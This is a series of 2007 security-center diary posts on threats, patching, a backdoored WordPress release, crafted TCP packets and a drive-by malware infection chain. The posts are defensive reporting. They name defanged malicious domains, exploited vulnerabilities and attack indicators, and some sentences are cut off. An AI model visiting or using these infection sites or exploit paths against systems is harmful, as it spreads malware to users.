As we saw, malware authors are definitely improving their work and are, almost certainly, aware of methods that analysts use. In this case, the </textarea> tag was directed against analysts, as it made no other sense in the rest of the code. Luckily, whatever has to run on your machine can be analyzed, but it will probably not be as easy to do that as it was in the past, as malware continues to evolve.


Published: 2007-03-04

Hardware isn't always more trustworthy than software

Last week one of my colleagues mentioned that he found it strange that people always thought software was the issue when IT related issues occured. He hit the nail right on the head: is hardware really more trustworthy ?

Polish security researcher Joanna Rutkowska last week gave some good evidence that this need not always hold true. At the Blackhat conference in Washington, DC she showed three different scenarios in which software can fool hardware-based forensic acquisition of RAM memory.

The attacks, while still only theoretical, were developed for the AMD64 platform and could allow software running on a compromised system to cause such tools to crash, read out "garbage" data or in fact present them with fake content. This could make it impossible for a forensic investigator to discover malware in memory, even though it is in fact there.

Intelligence principles have always dictated we need to be very careful where we get our information from, and preferably triangulate it with other sources. Understanding whether the object sourcing us the information has motivation to lie to us, is becoming more and more important. In essence, Joanna shows that DMA (direct memory access) really isn't all that direct, and we need to better understand the limitations of our tools.

Maarten Van Horenbeeck


Published: 2007-03-04

New tool in the fight against malware distribution

The Internet Storm Center often reports on the use of defaced websites in malware distribution. High profile examples such as the recent Dolphin Stadium web site compromise show that web masters have every reason to be very interested in exactly what they are serving up to an ever more mobile and global audience.

Niels Provos recently released a tool, SpyBye, that allows a webmaster to perform exactly such an audit. SpyBye, of which version 0.2 was released yesterday, is a proxy server that analyzes a requested url, submits any links it finds through a rule based engine (including a list of known malicious sites) and then categorizes these in three categories: harmless, unknown or dangerous. A webmaster can install it on his local machine and then access his website to get detail on what exactly is taking place during the connection - that same webmaster, having knowledge of the expected content, will also be able to easily identify content that is suspicious, but could otherwise have been unreadable when obfuscated through some form of URI-encoding. 

This new version integrates with clamav to automatically scan downloaded files, and allows you to log all requests to syslog. Provos also provides a realtime version of the proxy so you can give it a try on-line. Note that it's still best to run any assessments of potentially dangerous content from a virtual machine, as the tool will continue to feed the results of requests classified as 'harmless' or 'unknown' to your browser.

Link: Monkey.org


Published: 2007-03-04

Wordpress 2.1.1 source backdoored

The Wordpress development team has a notification up on their blog that version 2.1.1 of Wordpress has been compromised, and code was added which allows remote code execution. This happened during a user-level compromise of one of their servers.

While not all 2.1.1 downloads have been affected, they advise that everyone running this version should upgrade to version 2.1.2 immediately. This version is fully verified and is not backdoored.

By way of mitigation, hosting providers that are not aware of the Wordpress versions running across their user base may wish to block access to theme.php and feed.php with a query string of 'ix=' or 'iz='.

More information: Wordpress.org


Published: 2007-03-03

Twilight zone: the time between vulnerability and patch installation

A little more than one week from now Microsoft will be releasing their monthly security updates. A recent security standard stated fairly bluntly that “relevant security patches need to be installed within one month of release”. Other standards are much less specific and define regulations regarding process, but not necessarily result. Perhaps today makes for a good time to have a look at patch management in general.

Good patch management is rooted in understanding your assets and understanding the threats. An organization needs a correct and up-to-date configuration management database, as well as a way of learning about new vulnerabilities and patches. Many vendors now offer ‘security intelligence’ services that provide prior notice of security vulnerabilities, and most of this information can also be obtained from open sources – such as this website. Patch information is generally available as part of a maintenance contract with software and hardware vendors.

The difficulties usually lie in understanding our own organization. An open question of many security professionals is how we can get sufficient understanding of both the tools that have been deployed legitimately for business reasons and of any software that has been installed – perhaps illegitimately - by end users. Even though eloquently formatted policy statements may forbid installation of unsupported software, these statements are of little use should such a tool lead to a significant compromise.

Software can be used to assist: tools such as Microsoft’s Systems Management Server can support central management of legitimate software, while vulnerability scanners such as Nessus, simple port enumeration tools or dedicated software agents can be employed to do enterprise software discovery of those less predictable assets.

By correlating deployed software with new vulnerabilities and engaging in thorough risk analysis, an organization can identify the importance of each issue, and decide on the required response time. However, not every vendor releases its patches according to a fixed schedule, and a new critical patch may be released on any given day. Rarely can they as such be installed immediately. New patches are usually initially reviewed by an information security team that may not have decision power over the availability of crucial business assets. Even if they would, the patches would need to be tested on quality assurance systems prior to deployment on business systems.

Our organization will need to mitigate the risk posed by the security vulnerability prior to the installation of a patch. This matches with real-life security risk management. When indication is given of an imminent security threat, the decision is often made to provide additional monitoring to enable either quicker response or perhaps prevention of the issue. The issues European travelers experienced last year in August when passing through London Heathrow after the discovery of a bombing plot, serves as a good example. During the initial highly costly monitoring phase, longer-term solutions were investigated and prepared for implementation – in this case the complete disallowance of fluids on board, and boosting development of technology to detect liquid explosives.

From my experience with how organizations deal with patches, I’ve noticed not too many of them are actually prepared to evaluate what they can do to mitigate an INFOSEC threat prior to the implementation of a patch. This component of vulnerability management is however becoming more and more important – recent examples have confirmed that in some specific vulnerabilities an exploit was in fact released some time prior to a patch.

One major vendor recently had a good idea in this respect. As part of their security advisories, they started releasing “Applied Intelligence Response” bulletins. These provide information on actions that can be taken to mitigate a certain vulnerability, but also provide hints on how to detect exploitation in progress. An organization that is still scheduling the deployment of a required fix, for example, now has the opportunity to deploy network-wide monitoring and hook this into their incident response process.

Do you have any stories or hints you want to share on how you or your organization deals with the time between vulnerability and patch installation? Get in touch!

Maarten Van Horenbeeck


Published: 2007-03-03

DST and time sensitive transactions

We've raised the Daylight Saving Time (DST) changes in the US a couple of times.  First when Microsoft pushed out a patch back in November 2006 and again in January when it was becoming clear that this might slip past a lot of people. 

It was raised again this week, with March 11 getting closer,  when we were requested to provide some comment on the impact of the early change.  

One of the impacts was raised in a field notice from Cisco (FN - 62663 - U.S. Daylight Savings Time Policy Changes Effective March 2007 - for ACS Windows).   Cisco's Secure Access Control Server (ACS) is used to provide authentication services through Radius and TACACS and is used in Kerberos implementations.  Kerberos allows for a time slide of about 10 minutes between the server and the client when authenticating.  So if the time is out by one hour, then the authentication will fail. 

No doubt the problem is not limited to this one implementation.   There are a number of Single Sign-On (SSO) or two factor authentication solutions that have a time reliance.  All of whom may have a similar issue. 

Other areas that may be an issue are log records as well as correlation engines.

Quite a number of vendors have been pumping out notifications on this topic the last couple of weeks, you may wish to give them the quick once over, just to double check if your environment will be affected.

Mark H


Published: 2007-03-02

Weekend grab bag

After a somewhat slow day at the Storm Center, I wanted to mention a few issues that we've heard about, but not written about in the last few days.

  1. Joanna Rutkowska was supposed to give a talk on Wednesday at BlackHat DC on a method that could be used to subvert hardware memory access (so rootkits could hide from live response memory captures).  I haven't yet seen any details, but it looks like it could be another fascinating/scary development.  The Dark Reading article is here.
  2. David Litchfield of NGSSoftware.com has released a paper that explains that contrary to Oracle's assertions in the past that CREATE PROCEDURE privs were required for many SQL injection attacks to succeed, it turns out that merely the ability to connect to the database (CREATE SESSION privilege) is sufficient.  All the more reason to limit the ability to connect to the database, encrypt the connections, and make sure you are using strong authentication.
  3. The continuing saga of A/V software vulnerable to DoS while attempting to unpack crafted files (previously Symantec, ClamAV and Trend had problems with UPX and Kaspersky with PE) hit Kaspersky again (UPX this time).  Apparently, they actually fixed the problem a month ago, but publicly acknowledged it today, see the posting to the vulnwatch list.
  4. There are a couple of interesting articles this week by folks who have managed to pull browser history without Javascript.  We've often recommended the NoScript extension to Firefox, but even that isn't enough anymore.  Check out the stories here, here, here, and the "original" one here.


Published: 2007-03-02

Total Lunar Eclipse

I realize this has absolutely nothing to do with infosec....but on Saturday March 3rd there will be a really cool total lunar eclipse.  NASA has the details on their web site.  For most of Asia and the Americas you will see it at moonset or moonrise respectively, Europe and Africa will enjoy it at night.  For our mates in eastern Australia and New Zealand you'll just have to watch it on TV.

So if your systems go haywire this weekend you'll have a good story to blame it on.  "Boss, there was a full moon, a total lunar eclipse, and for all I know sunspots were acting up....."  Your management will have no choice but to believe you.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-03-02

Recent Threat/Vulnerability Developments

There have been a few recent minor developments that I think warrant a mention.

There have been a handful of viruses recently that specifically target USB removable media, Win32.Agent,wj and VBS.Solow.E just two mention two.  This harks back to the old days of floppy-disk boot-sector viruses.  This is not the only old-school re-visitation I've seen in malicious code trends, there have also been a few destructive viruses recently reported.

A vulnerability in Adobe Acrobat that allows a malicious PDF file to call arbitrary file:// URLs was announced last night.

Things to keep an eye on over the weekend:

This Year of MOXB continues with PHP.  Something interesting is bound to turn up out of that.
The College Basketball championship begins in the US.  I would be surprised to not see any "March Madness" related schemes develop.


Published: 2007-03-02

Manager/Media Impact

Did you day start off something like this?

Boss-type-person rushes into room waving a print out of New computer virus threatens biz net and demanding to know "what you're doing about it."

Hopefully, you were able to tell them that you'd already deployed the patch for the vulnerability back in November 2006, that your perimeter doesn't allow inbound TCP/2967 nor TCP/2968, and that your AV signatures were up-to-date.  Then you should have been able to lean back, put your feet up on the desk and say: "see, this is why you pay me the big bucks-- so you don't appear CNN articles."

If your day didn't go as smoothly, you have my sympathies.  I spent more time today on conference calls, impromptu hallway meetings, and writing up briefings for what should have (and so far has actually been) a non-event for our environment.

This is not the first time that I've been impacted by non-event events.  It's why I have to monitor eWeek, so I have a heads up on what the suits are going be asking about that morning.

I didn't keep careful track, but one of the many repeated phrases of the day was "Money dot CNN is not going to produce a computer security scoop."  It's possible, just not probable.

I'm proposing we update our impact models expanding them from Confidentiality, Integrity, and Availability to include Management.  I'm joking, but only slightly.  More realistically, I will update our criteria of releasing internal communications to include media/manager impact.  This has happened enough that it needs to become part of my process.


Published: 2007-03-02

Deformed TCP Options - Got Packets?

We had a reader named John who sent us an email about some unusual traffic they are seeing.  I'm curious if this is isolated or widespread.  Here is a copy of his email for what they are seeing and an example of  5 packets all destined for different hosts.  If you are seeing this, please let us know and if you can send us a packet capture of the traffic.   Thanks!!

Over the past few weeks we have seen an increase in the number of snort alerts we have been receiving for "Truncated TCP options." Looking at the packets, they appear to be crafted. At first it was one host scanning one of our /16 blocks, then it was another a week later, then one more a couple days later and then a couple every day. some of the times these scans are sourced from random ports, but some times they are sourced from common ports like 80, 443 and 6667. They have come across as syn packets, ack packets (for which there was no initiating syns), or syn/acks (again there were no initiating syns). The destination ports are always within the lowest ephemeral ports (1024-1300), and there is no consistency in the OS of the hosts that do respond. Because so few host do respond to these packets, I believe that one of the objectives of this scan may be to probe firewall configurations (we have a standing policy requiring host based firewalls), but it seems the level of crafting involved would be overkill.

When looking at some of the packets what we see is that the tcp option for mss is called twice, with the second one running past the end of the packet. When I counted the headers based upon the data in the IP and TCP header fields, it appears these packets are the correct length.

07:11:45.781421 IP (tos 0x0, ttl 113, id 9433, offset 0, flags [DF], proto: TCP (6), length: 48) > www.xxx.yyy.zzz.1229: S, cksum 0x5ed4 (correct), 2627126762:2627126762(0) ack 257795
6091 win 1460 <mss 1460,nop,[bad opt]>

0x0000: 4500 0030 24d9 4000 7106 4944 81fa 8015 E..0$.@.q.ID....
0x0010: wwxx XXYY 04e8 04cd 9c96 c5ea 99a8 7cfb ...{..........|.
0x0020: 7012 05b4 5ed4 0000 0204 05b4 0102 0403 p...^...........

07:11:51.517325 IP (tos 0x0, ttl 113, id 21659, offset 0, flags [DF], proto: TCP (6), length: 48) > www.xxx.yyy.zzz.1070: S, cksum 0xa40c (correct), 1381904945:1381904945(0) ack 2301
854615 win 1460 <mss 1460,nop,[bad opt]>

0x0000: 4500 0030 549b 4000 7106 764c 81fa 8015 E..0T.@.q.vL....
0x0010: wwxx XXYY 04e4 042e 525e 3231 8933 8397 ........R^21.3..
0x0020: 7012 05b4 a40c 0000 0204 05b4 0102 0403 p...............

07:12:06.816985 IP (tos 0x0, ttl 113, id 5274, offset 0, flags [DF], proto: TCP (6), length: 48) > www.xxx.yyy.zzz.1132: S, cksum 0x90a5 (correct), 404326101:404326101(0) ack 122769195
4 win 1460 <mss 1460,nop,[bad opt]>

0x0000: 4500 0030 149a 4000 7106 10d2 81fa 8015 E..0..@.q.......
0x0010: wwxx XXYY 041e 046c 1819 86d5 492d 17b2 ..b,...l....I-..
0x0020: 7012 05b4 90a5 0000 0204 05b4 0102 0403 p...............

07:12:12.670863 IP (tos 0x0, ttl 113, id 38039, offset 0, flags [DF], proto: TCP (6), length: 48) > www.xxx.yyy.zzz.1204: S, cksum 0x0701 (correct), 269829739:269829739(0) ack 3374363
152 win 1460 <mss 1460,nop,[bad opt]>

0x0000: 4500 0030 9497 4000 7106 d97d 81fa 8015 E..0..@.q..}....
0x0010: wwxx XXYY 0440 04b4 1015 466b c920 b210 .....@....Fk....
0x0020: 7012 05b4 0701 0000 0204 05b4 0102 0403 p...............

07:12:22.675579 IP (tos 0x0, ttl 113, id 29721, offset 0, flags [DF], proto: TCP (6), length: 48) > www.xxx.yyy.zzz.1067: S, cksum 0x2919 (correct), 1872427362:1872427362(0) ack 69068
0305 win 1460 <mss 1460,nop,[bad opt]>

0x0000: 4500 0030 7419 4000 7106 cdbb 81fa 8015 E..0t.@.q.......
0x0010: wwxx XXYY 0409 042b 6f9a f962 292a f1f1 ..E....+o..b)*..
0x0020: 7012 05b4 2919 0000 0204 05b4 0102 0403 p...)...........


Published: 2007-03-02

Its been a malware kind of Day

Well, when it rains it pours and today it seems it has been raining malware.  Although, I can't say I'm sad since I enjoy playing with malware so much.   We have been busy doing to analysis on three different pieces of malware that had been submitted to us.  Due to space constraints, I'm only going to post information on one of them below that was the most interesting.  We also looked at malware that appeared to be a more targeted attack on a group and the latest RINBOT/DELBOT or whatever you want to call that bot variant. 

One of the is the first things I'd like to highlight is the recent news media attention to that has been generated over the latest version of RINBOT/DELBOT/SDBOT (depending on the AV folks your talking to).  I only bring this up since we've had many people writing in and wanting to know if we were going to post a diary on this.  I'm only going to post a few thoughts and then move on.  We already covered this malware in a previous diary entry.  The only that that seems to have changed is maybe an update to the vulnerabilities it can use to spread and the latest rant at whoever the author is mad at now.  In this case, Symantec seems to be the target now.  With that in mind, its surprising that its getting so much publicity when its just another bot variant.  It is sad, but bots are very common place on the internet today.

Now, on to some other interesting pieces of malware that are new.  We received an email from a reader named Chris who had a user report their system attempted to connect to a remote network.  The firewall alert ed the user to the outbound traffic.  The file that requested the outbound traffic was a file called ~.exe.  A few of us looked at the file, but saw nothing malicious about the file itself.  It opened a message box with a title of OK.  No outbound traffic occurred.  After a few more email exchanges, we got some more critical information: 
"The user states that their Firewall (COMODO Firewall Pro) alerted to it after visiting hxxp://www.owned.com/Owned_Pictures - they checked the site again and NOD32
alerted to the webpage containing an unknown PE virus."

Nice, now we have a good starting point.  Several of us did some analysis on how the site was doing the exploit.  I would like to post the results from fellow handler Bojan Zdrnja who did an outstanding job with this, especially the de-obfuscation of the javascript.   For those wanting to try their hand at it, Bojan used the SpiderMonkey technique described here.  Now for his analysis of what was found:

The initial infection site is definitely http:// www [dot]
owned.com/Owned_Pictures (oh irony, looks like they've been owned).

On that web page there is an iframe which points to http://www [dot]
trudomain.com/hello.html. That is an obfuscated JavaScript which isn't
completely trivial to deobfuscate.
However, once you manage to do that, you will see that it is just
another iframe that will send your browser to http://www [dot]

This page contains a bigger obfuscated JavaScript which attempts to
exploit a bunch of vulnerabilities. Among the usual MSXML2 and
ADODB.Stream exploits, it also contains exploit for the
WebViewFolderIcon vulnerability, for the WinZIP vulnerability and for
a QuickTime vulnerability.

Finally, if the exploit ran successfully, it will download an
executable from the same sie (www [dot] porcosnet.com). I haven't seen
the ~.exe file, but this is definitely malicious so I would suggest
that you thoroughly check the infected machine (and rebuild, if

So, check your logs.  And remember its not a very nice site if you decide to play:>)